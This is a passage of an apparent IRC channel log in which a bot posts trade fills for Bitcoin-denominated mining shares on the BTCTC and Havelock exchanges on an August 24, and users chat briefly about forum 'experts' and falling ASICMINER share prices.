0.001169 = 2.0458 BTC [+] Aug 24 15:35:18 [BTCTC] [KENILWORTH] 2 @ 0.001601 = 0.0032 BTC [-] Aug 24 15:36:24 [HAVELOCK] [XBOND] 2 @ 0.001169 = 0.0023 BTC [+] Aug 24 15:37:03 [BTCTC] [LABCOIN] 504 @ 0.002916 = 1.4697 BTC [+] Aug 24 15:37:12 [BTCTC] [LABCOIN] 1996 @ 0.002916 = 5.8203 BTC [+] Aug 24 15:37:26 [BTCTC] [LABCOIN] 975 @ 0.002916 = 2.8431 BTC [+] Aug 24 15:37:53 [BTCTC] [LABCOIN] 5 @ 0.002916 = 0.0146 BTC [+] Aug 24 15:38:43 [BTCTC] [LABCOIN] 20 @ 0.002917 = 0.0583 BTC [+] Aug 24 15:39:03 [BTCTC] [COGNITIVE] 1 @ 0.3539 BTC [+] Aug 24 15:40:00 [BTCTC] [LABCOIN] 380 @ 0.002917 = 1.1085 BTC [+] Aug 24 15:40:01 [BTCTC] [LABCOIN] 520 @ 0.002916 = 1.5163 BTC [-] Aug 24 15:41:26 [BTCTC] [ACTIVEMINING] 1 @ 0.005453 BTC [-] Aug 24 15:46:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.02757 = 0.1379 BTC [+] Aug 24 15:47:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.02757 = 0.1103 BTC [+] Aug 24 15:48:18 [BTCTC] [LABCOIN] 85 @ 0.002923 = 0.2485 BTC [+] Aug 24 15:49:24 [BTCTC] [LABCOIN] 20 @ 0.002922 = 0.0584 BTC [-] Aug 24 15:49:26 [BTCTC] [LABCOIN] 133 @ 0.002924 = 0.3889 BTC [+] Aug 24 15:49:27 [BTCTC] [LABCOIN] 157 @ 0.002925 = 0.4592 BTC [+] Aug 24 15:49:57 [BTCTC] [LABCOIN] 10 @ 0.00292 = 0.0292 BTC [-] Aug 24 15:50:25 [BTCTC] [LABCOIN] 15 @ 0.00292 = 0.0438 BTC [-] Aug 24 15:54:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.02763 = 0.2763 BTC [+] Aug 24 15:54:40 [BTCTC] [LABCOIN] 43 @ 0.002919 = 0.1255 BTC [-] Aug 24 16:00:51 [HAVELOCK] [XBOND] 6 @ 0.001169 = 0.007 BTC [+] Aug 24 16:01:33 [HAVELOCK] [AM100] 4 @ 0.0278 = 0.1112 BTC [-] Aug 24 16:02:50 [BTCTC] [DMS.MINING] 3 @ 0.003846 = 0.0115 BTC [-] Aug 24 16:04:35 [BTCTC] [ASICMINER-PT] 1 @ 2.77 BTC [+] Aug 24 16:04:37 [BTCTC] [ASICMINER-PT] 1 @ 2.76 BTC [-] Aug 24 16:04:38 [BTCTC] [ASICMINER-PT] 1 @ 2.752 BTC [-] Aug 24 16:04:39 [BTCTC] [ASICMINER-PT] 2 @ 2.751 = 5.502 BTC [-] Aug 24 16:04:40 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [-] Aug 24 16:08:13 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [-] Aug 24 16:08:15 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [-] Aug 24 16:09:19 [BTCTC] [TAT.ASICMINER] 21 @ 0.02757 = 0.579 BTC [-] Aug 24 16:11:38 [BTCTC] [LABCOIN] 20 @ 0.002868 = 0.0574 BTC [-] Aug 24 16:12:31 [BTCTC] [DMS.MINING] 100 @ 0.003846 = 0.3846 BTC [-] Aug 24 16:13:55 [BTCTC] [DMS.SELLING] 87 @ 0.01699 = 1.4781 BTC [+] Aug 24 16:15:06 [BTCTC] [ASICMINER-PT] 1 @ 2.796 BTC [+] Aug 24 16:16:07 [BTCTC] [DMS.SELLING] 170 @ 0.01699 = 2.8883 BTC [+] Aug 24 16:16:39 [BTCTC] [LABCOIN] 335 @ 0.002915 = 0.9765 BTC [+] Aug 24 16:16:41 [BTCTC] [LABCOIN] 20 @ 0.002916 = 0.0583 BTC [+] Aug 24 16:17:59 [BTCTC] [LABCOIN] 14 @ 0.002917 = 0.0408 BTC [+] Aug 24 16:18:33 [BTCTC] [LABCOIN] 358 @ 0.002917 = 1.0443 BTC [+] Aug 24 16:20:17 [BTCTC] [LABCOIN] 349 @ 0.002917 = 1.018 BTC [+] Aug 24 16:21:05 [BTCTC] [LABCOIN] 20 @ 0.002917 = 0.0583 BTC [+] Aug 24 16:22:01 [BTCTC] [LABCOIN] 369 @ 0.002917 = 1.0764 BTC [+] Aug 24 16:22:02 [BTCTC] [LABCOIN] 952 @ 0.002918 = 2.7779 BTC [+] Aug 24 16:22:45 [HAVELOCK] [XBOND] 1 @ 0.001169 BTC [+] Aug 24 16:22:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000758 BTC [-] Aug 24 16:23:12 [BTCTC] [LABCOIN] 369 @ 0.002918 = 1.0767 BTC [+] Aug 24 16:23:13 [BTCTC] [LABCOIN] 785 @ 0.002919 = 2.2914 BTC [+] Aug 24 16:25:06 [HAVELOCK] [SDSTM] 3 @ 0.00391 = 0.0117 BTC [+] Aug 24 16:25:27 [BTCTC] [LABCOIN] 1689 @ 0.0029 = 4.8981 BTC [-] Aug 24 16:26:01 [HAVELOCK] [SDSTM] 11 @ 0.00390004 = 0.0429 BTC [-] Aug 24 16:26:39 [BTCTC] [LABCOIN] 5 @ 0.002916 = 0.0146 BTC [+] Aug 24 16:30:40 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.000998 = 0.0998 BTC [+] Aug 24 16:30:42 [BTCTC] [TAT.VIRTUALMINE] 101 @ 0.000999 = 0.1009 BTC [+] Aug 24 16:33:43 [BTCTC] [LABCOIN] 43 @ 0.002914 = 0.1253 BTC [-] Aug 24 16:38:08 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002427 = 0.0243 BTC [-] Aug 24 16:38:09 [BTCTC] [TAT.MINIGAME] 25 @ 0.0002417 = 0.006 BTC [-] Aug 24 16:38:10 [BTCTC] [TAT.MINIGAME] 500 @ 0.000241 = 0.1205 BTC [-] Aug 24 16:40:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.02759 BTC [+] Aug 24 16:47:01 [BTCTC] [DMS.SELLING] 440 @ 0.01699 = 7.4756 BTC [+] Aug 24 16:49:22 [BTCTC] [TAT.ASICMINER] 40 @ 0.02759 = 1.1036 BTC [+] Aug 24 16:53:03 [BTCTC] [CB.IDIFF-E] 6 @ 0.029 = 0.174 BTC Aug 24 16:56:33 [BTCTC] [DMS.SELLING] 65 @ 0.01699 = 1.1044 BTC [+] Aug 24 16:56:34 .d Aug 24 16:56:35 50810339.04828 | Next Diff in 0 blocks | Estimated Change: 29.3758% in -1d 23h 54m 50s Aug 24 16:57:37 [BTCTC] [KENILWORTH] 110 @ 0.0018 = 0.198 BTC [+] Aug 24 16:59:21 [BTCTC] [DMS.SELLING] 5 @ 0.01699 = 0.085 BTC [+] Aug 24 17:01:13 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Aug 24 17:01:14 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Aug 24 17:01:16 [BTCTC] [ASICMINER-PT] 2 @ 2.71 = 5.42 BTC [-] Aug 24 17:01:17 [BTCTC] [ASICMINER-PT] 3 @ 2.705 = 8.115 BTC [-] Aug 24 17:01:18 [BTCTC] [ASICMINER-PT] 8 @ 2.704 = 21.632 BTC [-] Aug 24 17:01:18 [BTCTC] [ASICMINER-PT] 1 @ 2.704 BTC [-] Aug 24 17:01:19 [BTCTC] [ASICMINER-PT] 1 @ 2.703 BTC [-] Aug 24 17:01:20 [BTCTC] [ASICMINER-PT] 2 @ 2.703 = 5.406 BTC [-] Aug 24 17:01:22 [BTCTC] [ASICMINER-PT] 5 @ 2.702 = 13.51 BTC [-] Aug 24 17:02:31 [BTCTC] [LABCOIN] 4 @ 0.002916 = 0.0117 BTC [+] Aug 24 17:02:32 [BTCTC] [LABCOIN] 19 @ 0.002917 = 0.0554 BTC [+] Aug 24 17:02:34 [HAVELOCK] [XBOND] 14 @ 0.001169 = 0.0164 BTC [+] Aug 24 17:02:36 [BTCTC] [LABCOIN] 42 @ 0.002919 = 0.1226 BTC [+] Aug 24 17:02:37 [BTCTC] [LABCOIN] 168 @ 0.00292 = 0.4906 BTC [+] Aug 24 17:02:44 [HAVELOCK] [XBOND] 1 @ 0.001169 BTC [+] Aug 24 17:03:34 [BTCTC] [BTC-GROWTH] 4 @ 0.1001 = 0.4004 BTC [-] Aug 24 17:03:34 [BTCTC] [BTC-GROWTH] 11 @ 0.1 = 1.1 BTC [-] Aug 24 17:04:36 [BTCTC] [ASICMINER-PT] 1 @ 2.701 BTC [-] Aug 24 17:04:50 [BTCTC] [LABCOIN] 580 @ 0.002955 = 1.7139 BTC [+] Aug 24 17:05:18 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 24 17:06:20 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 24 17:07:08 [BTCTC] [BTC-TRADING-PT] 1 @ 0.989 BTC [+] Aug 24 17:07:39 [BTCTC] [BTC-TRADING-PT] 4 @ 0.99 = 3.96 BTC [+] Aug 24 17:10:09 .d Aug 24 17:10:09 65750060.14908 | Next Diff in 2015 blocks | Estimated Change: -99.9359% in 27d 23h 26m 14s Aug 24 17:10:39 [BTCTC] [TAT.VIRTUALMINE] 124 @ 0.0009919 = 0.123 BTC [-] Aug 24 17:12:00 [BTCTC] [RSM] 13 @ 0.0114 = 0.1482 BTC [+] Aug 24 17:12:02 [BTCTC] [RSM] 25 @ 0.0115 = 0.2875 BTC [+] Aug 24 17:12:03 [BTCTC] [RSM] 32 @ 0.01199 = 0.3837 BTC [+] Aug 24 17:13:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.0273 = 0.1365 BTC [-] Aug 24 17:13:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.0273 = 0.1365 BTC [-] Aug 24 17:13:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02722 BTC [-] Aug 24 17:13:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.02722 = 0.0817 BTC [-] Aug 24 17:13:41 [BTCTC] [TAT.ASICMINER] 100 @ 0.0272 = 2.72 BTC [-] Aug 24 17:14:21 [HAVELOCK] [XBOND] 9 @ 0.001169 = 0.0105 BTC [+] Aug 24 17:15:30 [BTCTC] [DMS.SELLING] 182 @ 0.01699 = 3.0922 BTC [+] Aug 24 17:17:29 [BTCTC] [RSM] 67 @ 0.01199 = 0.8033 BTC [+] Aug 24 17:17:30 [BTCTC] [RSM] 68 @ 0.012 = 0.816 BTC [+] Aug 24 17:19:03 [BTCTC] [RSM] 32 @ 0.012 = 0.384 BTC [+] Aug 24 17:24:44 [BTCTC] [KENILWORTH] 1000 @ 0.0018 = 1.8 BTC [+] Aug 24 17:29:20 [BTCTC] [BASIC-MINING] 2 @ 0.2584 = 0.5168 BTC [+] Aug 24 17:33:29 [BTCTC] [DMS.SELLING] 100 @ 0.01699 = 1.699 BTC [+] Aug 24 17:33:51 https://bitcointalk.org/index.php?topic=263445.3100 lol Aug 24 17:33:56 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Aug 24 17:39:13 [BTCTC] [DMS.PURCHASE] 37 @ 0.02052 = 0.7592 BTC [+] Aug 24 17:39:31 Everybody is a pro in engineering on the forums Aug 24 17:40:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.02913 = 0.2913 BTC [+] Aug 24 17:40:08 onlyk because of the asic craze. Aug 24 17:40:17 otherwise, the same people are expert child psychologists on mommy forums Aug 24 17:40:40 rofl Aug 24 17:40:43 and experienced businessmen, politicians, animal trainers, airline pilots, Aug 24 17:40:57 Pilots lol Aug 24 17:40:58 forums are pretty entertaining Aug 24 17:41:04 scuba divers, safari hunters, pottery archaeologists, antropologists and etc. Aug 24 17:41:27 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 24 17:41:28 [BTCTC] [ASICMINER-PT] 2 @ 2.693 = 5.386 BTC [-] Aug 24 17:41:29 [BTCTC] [ASICMINER-PT] 1 @ 2.692 BTC [-] Aug 24 17:41:30 i really am a pro pottery archaeologist Aug 24 17:41:30 [BTCTC] [ASICMINER-PT] 6 @ 2.691 = 16.146 BTC [-] Aug 24 17:41:31 [BTCTC] [ASICMINER-PT] 1 @ 2.69 BTC [-] Aug 24 17:41:33 [BTCTC] [ASICMINER-PT] 2 @ 2.687 = 5.374 BTC [-] Aug 24 17:41:35 [BTCTC] [ASICMINER-PT] 1 @ 2.68 BTC [-] Aug 24 17:41:36 [BTCTC] [ASICMINER-PT] 1 @ 2.66 BTC [-] Aug 24 17:41:37 [BTCTC] [ASICMINER-PT] 3 @ 2.654 = 7.962 BTC [-] Aug 24 17:41:39 [BTCTC] [ASICMINER-PT] 1 @ 2.654 BTC [-] Aug 24 17:41:40 [BTCTC] [ASICMINER-PT] 9 @ 2.651 = 23.859 BTC [-] Aug 24 17:41:41 [BTCTC] [ASICMINER-PT] 10 @ 2.65 = 26.5 BTC [-] Aug 24 17:41:41 [BTCTC] [ASICMINER-PT] 3 @ 2.65 = 7.95 BTC [-] Aug 24 17:41:42 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] Aug 24 17:41:43 [BTCTC] [ASICMINER-PT] 1 @ 2.631 BTC [-] Aug 24 17:41:43 ThickAsThieves now you done broke asicminer Aug 24 17:41:44 [BTCTC] [ASICMINER-PT] 10 @ 2.63 = 26.3 BTC [-] Aug 24 17:41:45 [BTCTC] [ASICMINER-PT] 2 @ 2.625 = 5.25 BTC [-] Aug 24 17:41:46 [BTCTC] [ASICMINER-PT] 1 @ 2.625 BTC [-] Aug 24 17:41:47 [BTCTC] [ASICMINER-PT] 1 @ 2.623 BTC [-] Aug 24 17:41:48 [BTCTC] [ASICMINER-PT] 4 @ 2.612 = 10.448 BTC [-] Aug 24 17:41:49 wow Aug 24 17:41:49 [BTCTC] [ASICMINER-PT] 1 @ 2.611 BTC [-] Aug 24 17:41:50 oops Aug 24 17:41:50 [BTCTC] [ASICMINER-PT] 1 @ 2.611 BTC [-] Aug 24 17:41:50 with your embarassing and ill timed comments. Aug 24 17:41:51 [BTCTC] [ASICMINER-PT] 1 @ 2.611 BTC [-] Aug 24 17:41:51 [BTCTC] [ASICMINER-PT] 1 @ 2.611 BTC [-] Aug 24 17:41:52 [BTCTC] [ASICMINER-PT] 15 @ 2.61 = 39.15 BTC [-] Aug 24 17:41:53 [BTCTC] [ASICMINER-PT] 10 @ 2.61 = 26.1 BTC [-] Aug 24 17:41:54 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [-] Aug 24 17:41:55 [BTCTC] [ASICMINER-PT] 1 @ 2.602 BTC [-] Aug 24 17:41:56 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] Aug 24 17:41:57 [BTCTC] [ASICMINER-PT] 20 @ 2.601 = 52.02 BTC [-] Aug 24 17:41:58 [BTCTC] [ASICMINER-PT] 2 @ 2.6 = 5.2 BTC [-] Aug 24 17:41:59 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Aug 24 17:42:00 [BTCTC] [ASICMINER-PT] 5 @ 2.6 = 13 BTC [-] Aug 24 17:42:01 [BTCTC] [ASICMINER-PT] 2 @ 2.6 = 5.2 BTC [-] Aug 24 17:42:01 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Aug 24 17:42:02 [BTCTC] [ASICMINER-PT] 10 @ 2.6 = 26 BTC [-] Aug 24 17:42:06 Oooo Aug 24 17:42:11 Ok. Aug 24 17:42:14 [HAVELOCK] [AM100] 2 @ 0.0267 = 0.0534 BTC [-] Aug 24 17:42:14 2.6 ugh Aug 24 17:42:16 [HAVELOCK] [AM100] 3 @ 0.02667 = 0.08 BTC [-] Aug 24 17:42:21 or it's part of his master plan Aug 24 17:42:44 ystarnaud still overpriced. Aug 24 17:43:18 I might buy into the AM scam when it hits 1.5 again. Aug 24 17:43:29 [BTCTC] [ACTIVEMINING] 2 @ 0.005483 = 0.011 BTC [+] Aug 24 17:43:42 [BTCTC] [ASICMINER-PT] 10 @ 2.6 = 26 BTC [-] Aug 24 17:44:17 [HAVELOCK] [AM1] 2 @ 2.77 = 5.54 BTC [-] Aug 24 17:44:20 [HAVELOCK] [AM1] 4 @ 2.76 = 11.04 BTC [-] Aug 24 17:44:22 [HAVELOCK] [AM1] 1 @ 2.66 BTC [-] Aug 24 17:44:56 [HAVELOCK] [AM100] 10 @ 0.0267 = 0.267 BTC [+] Aug 24 17:45:03 [HAVELOCK] [AM100] 27 @ 0.02667 = 0.7201 BTC [-] Aug 24 17:45:03 [HAVELOCK] [AM100] 1 @ 0.02666 BTC [-] Aug 24 17:45:03 [HAVELOCK] [AM100] 28 @ 0.02651001 = 0.7423 BTC [-] Aug 24 17:45:05 [HAVELOCK] [AM100] 6 @ 0.02651 = 0.1591 BTC [-] Aug 24 17:45:06 [HAVELOCK] [AM100] 1 @ 0.0265 BTC [-] Aug 24 17:45:08 [HAVELOCK] [AM100] 5 @ 0.0262 = 0.131 BTC [-] Aug 24 17:45:11 [HAVELOCK] [AM100] 15 @ 0.0261 = 0.3915 BTC [-] Aug 24 17:45:26 maybe i should consider auctioning off my few shares Aug 24 17:45:41 i'll buy em for 2.3 Aug 24 17:45:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.02714 = 0.0543 BTC [-] Aug 24 17:45:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02713 BTC [-] Aug 24 17:45:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.02712 = 0.1356 BTC [-] Aug 24 17:45:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.02711 = 0.2711 BTC [-] Aug 24 17:45:47 [BTCTC] [TAT.ASICMINER] 17 @ 0.0271 = 0.4607 BTC [-] Aug 24 17:45:48 [BTCTC] [TAT.ASICMINER] 9 @ 0.02702 = 0.2432 BTC [-] Aug 24 17:45:49 [BTCTC] [TAT.ASICMINER] 16 @ 0.02701 = 0.4322 BTC [-] Aug 24 17:46:29 [BTCTC] [ASICMINER-PT] 5 @ 2.602 = 13.01 BTC [+] Aug 24 17:46:30 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] Aug 24 17:46:32 [BTCTC] [ASICMINER-PT] 10 @ 2.6 = 26 BTC [-] Aug 24 17:46:41 [BTCTC] [DMS.SELLING] 100 @ 0.01699 = 1.699 BTC [+] Aug 24 17:47:02 [BTCTC] [DMS.MINING] 37 @ 0.0037 = 0.1369 BTC [-] Aug 24 17:47:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.02702 = 0.2702 BTC [+] Aug 24 17:47:12 [BTCTC] [TAT.ASICMINER] 14 @ 0.02701 = 0.3781 BTC [-] Aug 24 17:47:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Aug 24 17:47:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.027 = 0.135 BTC [-] Aug 24 17:47:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Aug 24 17:47:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.027 = 0.216 BTC [-] Aug 24 17:47:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.02689 = 0.0538 BTC [-] Aug 24 17:47:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.02688 = 0.1344 BTC [-] Aug 24 17:47:19 [BTCTC] [TAT.ASICMINER] 8 @ 0.02688 = 0.215 BTC [-] Aug 24 17:47:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.02685 = 0.0537 BTC [-] Aug 24 17:47:22 [BTCTC] [TAT.ASICMINER] 12 @ 0.02684 = 0.3221 BTC [-] Aug 24 17:47:23 [BTCTC] [TAT.ASICMINER] 11 @ 0.0266 = 0.2926 BTC [-] Aug 24 17:47:24 [BTCTC] [TAT.ASICMINER] 18 @ 0.02659 = 0.4786 BTC [-] Aug 24 17:47:24 [BTCTC] [TAT.ASICMINER] 38 @ 0.02659 = 1.0104 BTC [-] Aug 24 17:47:25 [BTCTC] [TAT.ASICMINER] 27 @ 0.02622 = 0.7079 BTC [-] Aug 24 17:47:26 [BTCTC] [TAT.ASICMINER] 25 @ 0.02621 = 0.6553 BTC [-] Aug 24 17:47:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.0262 = 0.262 BTC [-] Aug 24 17:47:29 [BTCTC] [TAT.ASICMINER] 250 @ 0.0262 = 6.55 BTC [-] Aug 24 17:47:36 [HAVELOCK] [SMG] 20 @ 0.000212 = 0.0042 BTC [-] Aug 24 17:47:38 [HAVELOCK] [SMG] 9 @ 0.000212 = 0.0019 BTC [-] Aug 24 17:48:20 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] Aug 24 17:48:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.02601 = 0.078 BTC [-] Aug 24 17:48:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.026 = 0.104 BTC [-] Aug 24 17:48:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [-] Aug 24 17:48:25 [HAVELOCK] [SMG] 10 @ 0.000212 = 0.0021 BTC [-] Aug 24 17:48:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.026 = 0.052 BTC [-] Aug 24 17:48:28 [BTCTC] [TAT.ASICMINER] 19 @ 0.026 = 0.494 BTC [-] Aug 24 17:48:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.026 = 0.078 BTC [-] Aug 24 17:48:30 [BTCTC] [TAT.ASICMINER] 18 @ 0.026 = 0.468 BTC [-] Aug 24 17:48:32 [HAVELOCK] [SMG] 65 @ 0.00021101 = 0.0137 BTC [-] Aug 24 17:48:39 [HAVELOCK] [SMG] 18 @ 0.000211 = 0.0038 BTC [-] Aug 24 17:48:46 [HAVELOCK] [SMG] 275 @ 0.00021 = 0.0578 BTC [-] Aug 24 17:49:03 [BTCTC] [DMS.MINING] 676 @ 0.0037 = 2.5012 BTC [-] Aug 24 17:49:31 [BTCTC] [DMS.MINING] 10 @ 0.00371 = 0.0371 BTC [+] Aug 24 17:49:32 [BTCTC] [DMS.MINING] 5 @ 0.003635 = 0.0182 BTC [-] Aug 24 17:51:17 [BTCTC] [DMS.MINING] 10 @ 0.00361 = 0.0361 BTC [-] Aug 24 17:51:18 [BTCTC] [DMS.MINING] 1 @ 0.0036 BTC [-] Aug 24 17:51:20 [BTCTC] [DMS.MINING] 100 @ 0.0036 = 0.36 BTC [-] Aug 24 17:51:39 [BTCTC] [DMS.MINING] 1 @ 0.003524 BTC [-] Aug 24 17:51:40 [BTCTC] [DMS.MINING] 125 @ 0.003523 = 0.4404 BTC [-] Aug 24 17:53:28 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.000781 = 0.0094 BTC [-] Aug 24 17:54:08 [BTCTC] [TAT.ASICMINER] 18 @ 0.026 = 0.468 BTC [-] Aug 24 17:54:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.026 = 0.052 BTC [-] Aug 24 17:54:11 [BTCTC] [TAT.ASICMINER] 20 @ 0.026 = 0.52 BTC [-] Aug 24 17:54:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.02553 = 0.0766 BTC [-] Aug 24 17:54:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.02541 = 0.2541 BTC [-] Aug 24 17:54:14 [BTCTC] [TAT.ASICMINER] 18 @ 0.02535 = 0.4563 BTC [-] Aug 24 17:54:16 [BTCTC] [TAT.ASICMINER] 19 @ 0.02531 = 0.4809 BTC [-] Aug 24 17:54:19 [BTCTC] [TAT.ASICMINER] 80 @ 0.0253 = 2.024 BTC [-] Aug 24 17:54:20 [BTCTC] [TAT.ASICMINER] 80 @ 0.0252 = 2.016 BTC [-] Aug 24 17:55:13 [BTCTC] [DMS.MINING] 2 @ 0.003777 = 0.0076 BTC [+] Aug 24 17:56:33 [BTCTC] [LABCOIN] 125 @ 0.002939 = 0.3674 BTC [-] Aug 24 17:57:36 [BTCTC] [DMS.PURCHASE] 41 @ 0.02052 = 0.8413 BTC [+] Aug 24 17:57:56 [BTCTC] [LABCOIN] 125 @ 0.002939 = 0.3674 BTC [-] Aug 24 17:58:01 [HAVELOCK] [CFIG] 2 @ 0.1479 = 0.2958 BTC [-] Aug 24 17:58:03 [HAVELOCK] [CFIG] 8 @ 0.148 = 1.184 BTC [+] Aug 24 18:00:14 [BTCTC] [LABCOIN] 90 @ 0.002939 = 0.2645 BTC [-] Aug 24 18:03:10 [BTCTC] [ASICMINER-PT] 6 @ 2.56 = 15.36 BTC [-] Aug 24 18:03:30 [BTCTC] [BTC-TRADING-PT] 1 @ 1.08 BTC [+] Aug 24 18:04:22 [HAVELOCK] [AM100] 10 @ 0.026 = 0.26 BTC [-] Aug 24 18:08:06 [HAVELOCK] [AM100] 1 @ 0.0273 BTC [+] Aug 24 18:08:16 [BTCTC] [DMS.SELLING] 8 @ 0.01699 = 0.1359 BTC [+] Aug 24 18:09:00 [HAVELOCK] [XBOND] 12 @ 0.00116899 = 0.014 BTC [-] Aug 24 18:10:31 [BTCTC] [ASICMINER-PT] 2 @ 2.555 = 5.11 BTC [-] Aug 24 18:10:40 [HAVELOCK] [AM100] 1 @ 0.0262 BTC [-] Aug 24 18:10:43 [HAVELOCK] [AM100] 6 @ 0.0261 = 0.1566 BTC [-] Aug 24 18:10:48 [HAVELOCK] [AM100] 15 @ 0.026 = 0.39 BTC [-] Aug 24 18:13:57 [BTCTC] [ASICMINER-PT] 2 @ 2.553 = 5.106 BTC [-] Aug 24 18:13:58 [BTCTC] [ASICMINER-PT] 1 @ 2.553 BTC [-] Aug 24 18:13:59 [BTCTC] [ASICMINER-PT] 5 @ 2.551 = 12.755 BTC [-] Aug 24 18:14:15 [HAVELOCK] [XBOND] 337 @ 0.00116899 = 0.3939 BTC [-] Aug 24 18:14:37 [HAVELOCK] [AM100] 4 @ 0.02581 = 0.1032 BTC [-] Aug 24 18:14:39 [HAVELOCK] [AM100] 35 @ 0.0258 = 0.903 BTC [-] Aug 24 18:14:42 [BTCTC] [TAT.ASICMINER] 24 @ 0.0255 = 0.612 BTC [+] Aug 24 18:14:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02516 BTC [-] Aug 24 18:16:55 [BTCTC] [LABCOIN] 125 @ 0.002939 = 0.3674 BTC [-] Aug 24 18:16:57 [BTCTC] [LABCOIN] 500 @ 0.00294 = 1.47 BTC [+] Aug 24 18:18:12 [BTCTC] [DMS.MINING] 10 @ 0.003572 = 0.0357 BTC [-] Aug 24 18:18:13 [BTCTC] [DMS.MINING] 10 @ 0.003545 = 0.0355 BTC [-] Aug 24 18:18:15 [BTCTC] [DMS.MINING] 45 @ 0.003523 = 0.1585 BTC [-] Aug 24 18:19:42 [BTCTC] [DMS.SELLING] 300 @ 0.01699 = 5.097 BTC [+] Aug 24 18:20:08 [BTCTC] [DMS.MINING] 20 @ 0.003511 = 0.0702 BTC [-] Aug 24 18:20:09 [BTCTC] [DMS.MINING] 5 @ 0.00351 = 0.0176 BTC [-] Aug 24 18:20:11 [BTCTC] [DMS.MINING] 10 @ 0.003455 = 0.0346 BTC [-] Aug 24 18:20:12 [BTCTC] [DMS.MINING] 1 @ 0.003406 BTC [-] Aug 24 18:20:13 [BTCTC] [DMS.MINING] 4 @ 0.003406 = 0.0136 BTC [-] Aug 24 18:20:14 [BTCTC] [DMS.MINING] 25 @ 0.003406 = 0.0852 BTC [-] Aug 24 18:20:51 [BTCTC] [DMS.MINING] 10 @ 0.003455 = 0.0346 BTC [+] Aug 24 18:20:53 [BTCTC] [DMS.MINING] 35 @ 0.003406 = 0.1192 BTC [-] Aug 24 18:21:03 [HAVELOCK] [HIM] 20 @ 0.218 = 4.36 BTC [+] Aug 24 18:21:51 [BTCTC] [BASIC-MINING] 2 @ 0.246 = 0.492 BTC [-] Aug 24 18:22:15 [BTCTC] [HOSTED-MINING] 6 @ 0.28 = 1.68 BTC [+] Aug 24 18:22:53 [BTCTC] [LABCOIN] 1 @ 0.002989 BTC [+] Aug 24 18:23:42 [HAVELOCK] [AM100] 10 @ 0.02565 = 0.2565 BTC [-] Aug 24 18:24:11 [HAVELOCK] [AM100] 10 @ 0.0252 = 0.252 BTC [-] Aug 24 18:24:15 [HAVELOCK] [AM100] 111 @ 0.0251 = 2.7861 BTC [-] Aug 24 18:24:33 [HAVELOCK] [AM100] 25 @ 0.025 = 0.625 BTC [-] Aug 24 18:24:36 [HAVELOCK] [AM100] 2 @ 0.025 = 0.05 BTC [-] Aug 24 18:24:38 [HAVELOCK] [AM100] 1 @ 0.025 BTC [-] Aug 24 18:24:41 [HAVELOCK] [AM100] 1 @ 0.02350001 BTC [-] Aug 24 18:25:46 [BTCTC] [TAT.ASICMINER] 18 @ 0.02516 = 0.4529 BTC [-] Aug 24 18:25:48 [BTCTC] [TAT.ASICMINER] 190 @ 0.02515 = 4.7785 BTC [-] Aug 24 18:25:49 [BTCTC] [TAT.ASICMINER] 31 @ 0.02514 = 0.7793 BTC [-] Aug 24 18:25:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.02513 BTC [-] Aug 24 18:25:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.025126 = 0.0503 BTC [-] Aug 24 18:25:52 [BTCTC] [TAT.ASICMINER] 40 @ 0.02512 = 1.0048 BTC [-] Aug 24 18:25:54 [BTCTC] [TAT.ASICMINER] 8 @ 0.02512 = 0.201 BTC [-] Aug 24 18:25:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.02501 = 0.2501 BTC [-] Aug 24 18:26:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Aug 24 18:26:04 [BTCTC] 